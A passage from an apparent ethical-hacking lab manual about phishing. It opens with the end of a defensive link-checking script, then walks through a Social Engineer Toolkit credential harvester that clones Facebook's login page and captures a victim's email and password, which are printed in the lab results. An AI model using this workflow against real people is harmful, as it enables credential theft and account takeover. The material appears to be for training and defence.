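        if shown and shown != target and not target.endswith("." + shown):
            reasons.append(f"text shows {shown} but href goes to {target}")
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


# Constructed sample body modelled on the lab's message (placeholder addresses).
SAMPLE_EMAIL = """
<p>Hello Sam,</p>
<p>Please click this link <a href="http://10.0.0.15">www.facebook.com/Rini TGIF</a>
to view the weekend party pictures at TGIF with the celebrities.</p>
<p>Regards. Our page: <a href="https://www.facebook.com/">www.facebook.com</a></p>
"""

if __name__ == "__main__":
    for finding in find_suspicious_links(SAMPLE_EMAIL):
        print(finding["text"], "->", finding["href"], ":", "; ".join(finding["reasons"]))
```

The same check also catches the lookalike-domain variant mentioned in the side note (text gmail.com, href gmai1.com), since the hosts compare unequal.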

19. When the victim clicks the URL, he or she will be presented with a replica of Facebook.com.

20. The victim will be enticed to enter his or her user name and password into the form fields, as it appears to be a genuine website. When the victim enters the Username and Password and clicks Log In, it does not allow logging in; instead, it redirects to the legitimate Facebook login page. Observe the URL in the browser.


The multi-attack vector allows you to turn on and off different vectors and combine the attacks all into one specific webpage. So when the user clicks the link he will be targeted by each of the attack vectors you specify. One thing to note with the attack vector is you can't utilize Tabnabbing, Cred Harvester, or Web Jacking with the Man Left in the Middle attack.

The multi attack vector utilises each combination of attacks and allows the user to choose the method for the attack. Once you select one of the attacks, it will be added to your attack profile to be used to stage the attack vector. When you're finished be sure to select the 'I'm finished' option.

[Screenshots: the cloned Facebook login page served from the BackTrack machine, and the legitimate Facebook login page at https://www.facebook.com/login.php to which the victim is redirected after clicking Log In; the browser offers to save the password.]

FIGURE 3.16: Fake and Legitimate Facebook login page

21. As soon as the victim types in the email address and password, the SET Terminal in BackTrack fetches the typed user name and password, which can be used by an attacker to gain unauthorized access to the victim's account.


[Screenshot: SET Terminal window showing the Credential Harvester running on port 80, a GET / request logged from 10.0.0.2, the message "WE GOT A HIT! Printing the output:" followed by the POSTed PARAM: lines, a "POSSIBLE USERNAME FIELD FOUND" line, and the reminder "WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT."]

Social Engineer Toolkit Mass E-Mailer: There are two options on the mass e-mailer; the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as you want within that list.

FIGURE 3.17: SET found Username and Password

22. Press CTRL+C to generate a report for the attack performed.
[Screenshot: SET Terminal window listing the captured PARAM: lines together with "POSSIBLE USERNAME FIELD FOUND: email=" and "POSSIBLE PASSWORD FIELD FOUND: pass=test", then, after CTRL+C, the messages that the report was exported in HTML and XML format to the reports/ directory and the prompt "Press <return> to continue".]

The multi-attack will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.

FIGURE 3.18: Generating Reports through SET

Lab Analysis
Analyze and document the results related to the lab exercise.


Tool/Utility: Social Engineering Toolkit

Information Collected/Objectives Achieved:
PARAM: lsd=AVqgmkGh
PARAM: return_session=0
PARAM: legacy_return=1
PARAM: display=
PARAM: session_key_only=0
PARAM: trynum=1
PARAM: charset_test=€,',€,',
PARAM: timezone=-540
PARAM: lgnrnd=224034_ArYA
PARAM: lgnjs=n
email=samchoang@yahoo.com
pass=test@123

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Evaluate each of the following Paros proxy options:
   a. Trap Request
   b. Trap Response
   c. Continue button
   d. Drop button

Internet Connection Required: ☑ Yes ☐ No
Platform Supported: ☑ Classroom ☐ iLabs
